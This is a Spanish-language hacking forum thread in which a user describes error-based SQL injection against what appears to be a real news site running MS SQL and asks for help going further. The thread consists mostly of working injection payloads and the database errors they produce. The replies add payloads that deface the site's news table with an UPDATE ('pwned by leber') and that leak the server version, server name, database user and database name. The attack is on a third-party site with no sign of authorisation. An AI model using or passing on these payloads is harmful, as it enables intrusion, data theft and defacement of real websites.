Duda con SQL injection

[satan69]

Heme aqui de nuevo ( ¿que desgracia eh  ?)

Bueno, vamos a ver:

Consegui sacar el nombre de una columna de una web(trabala con MS SQL), y bueno, probe algo mas, pero me quede encallado. Primero hice:

id=456+having+1=1

Y me produjo el siguiente error:

Código [Seleccionar] Expandir

[La columna 'noticias.ANTETITULO' de la lista de selección no es válida, porque no está contenida en una función de agregado y no hay cláusula GROUP BY./code]

Asi que luego hice:

id=456+group+by+noticias.ANTETITULO+having+1=1

Y me salio:

[code]Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]La columna 'noticias.TITULO' de la lista de selección no es válida, porque no está contenida en una función de agregado ni en la cláusula GROUP BY.

/web/sp/index.asp, line 11

Asi que fui rellenando con group by, hasta que al tratar de meter la sentencia:

Código [Seleccionar] Expandir


id=456+group+by+noticias.ANTETITULO+,noticias.TITULO+,noticias.ENTRADILLA+,noticias.FECHA+,noticias.HEAD,+noticias.TEXTO+having+1=1--


Me produjo el siguiente error:

Código [Seleccionar] Expandir

[Microsoft][ODBC SQL Server Driver][SQL Server]No se puede comparar ni ordenar los tipos de datos text, ntext e image, excepto cuando se utiliza el operador IS NULL o LIKE.

Y ahi me quede, intente sacar la version con

Código [Seleccionar] Expandir

id=456+union+select+@@version,1,1,1,1

Y me dijo:

Código [Seleccionar] Expandir

[Microsoft][ODBC SQL Server Driver][SQL Server]Error de sintaxis al convertir el valor varchar 'Cinco organizaciones ecologistas denuncian la especulación urbanística como la principal amenaza del medio ambiente en España' para una columna de tipo de datos int.

Y nada mas, me quede ahi estancado, a ver si alguien puede echarme una mano, solo orientarme un poco(no me gusta que me hagan las cosas), para donde puedo ir o cuales pueden ser mis movimientos siguientes.

Gracias de antemano, y un saludo

[/code]

es asi la onda:

Código [Seleccionar] Expandir

id=1' having 1=1--

ayi tira el error... y la mayor veces te muestra los campos y el nombre de la tabla

[Leber]

En algunas paginas no funciona con ', y  por eso tuve que meterlo sin la comilla.

[sch3m4]

(...) te darás cuenta de porqué te salta ese error cuando metes la comilla (las comillas se usan para las cadenas) (...)

Depende de si la página interpreta ese dígito como un número, o como carácter.

[Leber]

Si, eso ya lo lei y me entere, pero cuando me salta este error por ejemplo:

Código [Seleccionar] Expandir

[Microsoft][ODBC SQL Server Driver][SQL Server]No se puede comparar ni ordenar los tipos de datos text, ntext e image, excepto cuando se utiliza el operador IS NULL o LIKE.

Haciendo el groupby con todas las columnas que me dijo, que deberia hacer? tratar de convertirle a numero, o usarlo con comillas supongo, no?

Saludos

[pedrox@]

aver.......
El simbolo + no te hace falta que lo pongas antes de la coma, podria quedar asi:

Código [Seleccionar] Expandir

id=456+group+by+noticias.ANTETITULO,noticias.TITULO,noticias.ENTRADILLA,noticias.FECHA,noticias.HEAD,noticias.TEXTO+having+1=1--

Si te sigue tirando error, puede ser porque ya no existan mas columnas.
Si quieres updatear una, puedes hacer:

Código [Seleccionar] Expandir

id=456+update+noticias+set+TITULO+=+'pwned by leber'--

Si quieres obtener la versión del servidor MS SQL, con que hagas esto ya te vale:

id=1+and+1=convert(int,@@version)--

Nombre del servidor:

id=1+and+1=convert(int,@@servername)--

Nombre del usuario de la DB:

id=1+and+1=convert(int,system_user)

Nombre de la DB de la página web:

id=1+and+1=convert(int,db_name())

Espero que te sirva.

Saludos.